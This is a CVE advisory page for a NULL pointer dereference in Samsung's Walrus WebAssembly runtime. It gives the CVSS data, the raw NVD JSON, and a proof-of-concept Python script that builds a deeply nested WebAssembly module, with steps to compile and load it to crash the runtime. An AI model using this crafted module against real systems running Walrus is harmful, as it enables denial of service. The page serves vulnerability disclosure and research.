Security Vulnerability Report
CVE-2026-47307 CVSS 5.5 MEDIUM

Published: 2026-05-19 04:16:31
Last Modified: 2026-05-19 14:25:40

Description

NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Samsung Walrus commit f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-47307: NULL Pointer Dereference in Samsung Walrus
# This script generates a WebAssembly Text (WAT) module with deeply nested instructions.
# The generated WAT can be compiled to binary (.wasm) to trigger the DoS.

def generate_nested_wat(depth):
    # Generate deeply nested blocks
    nested_content = "(nop)"
    for _ in range(depth):
        nested_content = f"(block {nested_content})"
    return f"(module (func (export \"test\") {nested_content}))"

if __name__ == "__main__":
    # Depth might need to be high to trigger the specific condition
    DEPTH = 10000
    wat_code = generate_nested_wat(DEPTH)
    print(f"Generated WAT code with depth {DEPTH}:")
    print(wat_code)
    # To exploit:
    # 1. Save the output to a file named 'exploit.wat'
    # 2. Use a wat2wasm compiler to convert it to 'exploit.wasm'
    # 3. Load 'exploit.wasm' in the vulnerable Samsung Walrus application.
    # The application should crash due to NULL pointer dereference.

References

https://github.com/Samsung/walrus/pull/409

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-47307", "sourceIdentifier": "[email protected]", "published": "2026-05-19T04:16:31.317", "lastModified": "2026-05-19T14:25:40.320", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions.\n\nThis issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/Samsung/walrus/pull/409", "source": "[email protected]"}]}}